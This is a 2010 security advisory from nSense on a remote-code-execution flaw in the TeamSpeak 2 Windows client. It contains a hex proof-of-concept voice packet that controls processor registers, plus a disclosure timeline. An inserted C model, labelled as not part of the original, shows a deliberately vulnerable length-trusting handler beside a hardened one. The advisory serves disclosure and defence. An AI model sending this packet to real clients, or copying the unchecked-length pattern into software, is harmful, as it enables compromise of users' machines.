Published: Nov 01, 2010

nSense-2010-002: Teamspeak 2 Windows client

Source: vulners.com
   nSense Vulnerability Research Security Advisory NSENSE-2010-002
   ---------------------------------------------------------------
               t2'10 infosec conference special release
                           http://www.t2.fi
   ---------------------------------------------------------------

   Affected Vendor:    Teamspeak Systems GmbH
   Affected Product:   Teamspeak 2 version 2.0.32.60
   Platform:           Windows
   Impact:             Remote code execution
   Vendor response:    No patch. Upgrade to TS3
   Credit:             Jokaim / nSense

   Technical details
   ---------------------------------------------------------------

   The specific flaw exists within the TeamSpeak.exe module, in the
   teardown procedure responsible for freeing dynamically allocated
   application handles.

   This memory area can be corrupted by transmitting a voice
   transmission packet (type 0xf2) to the server, which relays it to
   the other connected clients; every client receiving the voice
   transmission has its memory corrupted. The corruption overflows
   values that are later used in a copy operation (during teardown),
   so a single malicious client can affect all clients at once.

   This can be leveraged to achieve remote code execution
   within the context of the user running the application.
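   As an added illustration that is not part of the original advisory,
   the C model below shows the bug class described above: a 0xf2 voice
   packet whose length field is trusted, so an attacker-chosen value
   survives into the connection teardown path and is handed to memcpy.
   The packet layout ([0xf2][16-bit little-endian length][payload]), the
   struct session layout, VOICE_BUF and all function names are
   assumptions made for this example; TeamSpeak 2's real wire format and
   data structures are not documented in the advisory. The vulnerable
   handler sits beside a hardened one that rejects the packet before any
   state is touched.

```c
/* Model of the advisory's bug class; hypothetical layout and wire
 * format, NOT TeamSpeak 2's real code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define VOICE_PKT 0xf2u
#define VOICE_BUF 32u   /* hypothetical fixed per-session voice buffer */
#define HDR_LEN   3u    /* type byte + 16-bit little-endian length (assumed) */

struct session {
    uint8_t  voice[VOICE_BUF];  /* last voice frame received */
    uint32_t pending_len;       /* bytes teardown() will flush */
};

/* Build a hypothetical voice packet: [0xf2][len lo][len hi][payload].
 * declared_len is what the packet claims; payload_len is what is sent.
 * Returns the packet size, or 0 if it does not fit in out. */
size_t build_voice_packet(uint8_t *out, size_t cap, uint16_t declared_len,
                          const uint8_t *payload, size_t payload_len)
{
    if (cap < HDR_LEN + payload_len) return 0;
    out[0] = VOICE_PKT;
    out[1] = (uint8_t)(declared_len & 0xff);
    out[2] = (uint8_t)(declared_len >> 8);
    memcpy(out + HDR_LEN, payload, payload_len);
    return HDR_LEN + payload_len;
}

/* Vulnerable handler: copies only what fits, but records the packet's
 * own length claim unchecked. pending_len is now attacker controlled
 * and teardown() trusts it. Returns 0 on accept, -1 on reject. */
int vuln_handle(struct session *s, const uint8_t *pkt, size_t n)
{
    if (n < HDR_LEN || pkt[0] != VOICE_PKT) return -1;
    uint16_t claimed = (uint16_t)(pkt[1] | (pkt[2] << 8));
    size_t payload = n - HDR_LEN;
    memcpy(s->voice, pkt + HDR_LEN, payload < VOICE_BUF ? payload : VOICE_BUF);
    s->pending_len = claimed;   /* BUG: never compared to payload or VOICE_BUF */
    return 0;
}

/* Hardened handler: the claimed length must equal the bytes actually
 * present and must fit the buffer; otherwise the packet is dropped. */
int safe_handle(struct session *s, const uint8_t *pkt, size_t n)
{
    if (n < HDR_LEN || pkt[0] != VOICE_PKT) return -1;
    uint16_t claimed = (uint16_t)(pkt[1] | (pkt[2] << 8));
    size_t payload = n - HDR_LEN;
    if (claimed != payload || claimed > VOICE_BUF) return -1;
    memcpy(s->voice, pkt + HDR_LEN, payload);
    s->pending_len = claimed;
    return 0;
}

/* Teardown copy as the vulnerable client would do it: no check that
 * pending_len fits dst. Only call it when teardown_would_overflow()
 * is false; the overflow case is the bug, not something to execute. */
void teardown(struct session *s, uint8_t *dst)
{
    memcpy(dst, s->voice, s->pending_len);
    memset(s, 0, sizeof *s);
}

/* Makes the teardown path's implicit assumption explicit. */
int teardown_would_overflow(const struct session *s, size_t dst_sz)
{
    return s->pending_len > dst_sz;
}

int main(void)
{
    uint8_t payload[8], pkt[64], dst[VOICE_BUF];
    struct session s;
    memset(payload, 'A', sizeof payload);   /* constructed sample payload */

    /* Honest packet: claims 8 bytes, sends 8. */
    memset(&s, 0, sizeof s);
    size_t n = build_voice_packet(pkt, sizeof pkt, 8, payload, sizeof payload);
    vuln_handle(&s, pkt, n);
    printf("honest: pending_len=%u overflow=%d\n", (unsigned)s.pending_len,
           teardown_would_overflow(&s, sizeof dst));
    teardown(&s, dst);

    /* Malicious packet: claims 0x4141 bytes, sends 8. */
    memset(&s, 0, sizeof s);
    n = build_voice_packet(pkt, sizeof pkt, 0x4141, payload, sizeof payload);
    printf("vuln_handle: accepted=%d pending_len=0x%x overflow=%d\n",
           vuln_handle(&s, pkt, n) == 0, (unsigned)s.pending_len,
           teardown_would_overflow(&s, sizeof dst));
    memset(&s, 0, sizeof s);
    printf("safe_handle: accepted=%d\n", safe_handle(&s, pkt, n) == 0);
    return 0;
}
```

   The point of the model is the split between "bytes received" and
   "bytes claimed": the vulnerable path bounds the immediate copy but
   lets the claimed value flow into later state, which is exactly the
   shape of a corruption that only detonates at teardown. The hardened
   path validates the length at the parsing boundary, before any field
   of the session is written.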

   The following packet is provided as a Proof-of-Concept example:
   f2be000426ad7e00300000000001000a414141414141414141424141414141
   4141414141414141414141414141414141414100ff99414141424242424141
   414141414141414141

   Bytes 51 onwards contain user-controllable values for EAX and EDX
   (see the instruction at memory location 00401C72). A weaponized
   exploit has been developed but will not be released to the public.

   Timeline:
   Jul 20th        Contacted CERT-FI vulncoord
   Jul 22nd        CERT-FI vulncoord responds, coordination started
   Aug 9th         Status update request sent to CERT-FI
   Aug 20th        CERT-FI informs that the vendor had suggested
                   posting the issue to their public support
                   forum. Coordination continued.
   Aug 26th        Status update request sent to CERT-FI
   Aug 26th        CERT-FI responds
   Sep 23rd        Weaponized exploit ready and polished.
                   Information sent to CERT-FI
   Sep 28th        CERT-FI informs that the vendor is not supporting
                   TS2, since it is a legacy version. Users are
                   instructed to upgrade to TS3.
   Oct 28th        Advisory published.

   A thank you to CERT-FI vulncoord for the coordination effort.


   http://www.nsense.fi                       http://www.nsense.dk



   $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
   $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
   $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
   $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
   $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

                  D r i v e n   b y   t h e   c h a l l e n g e _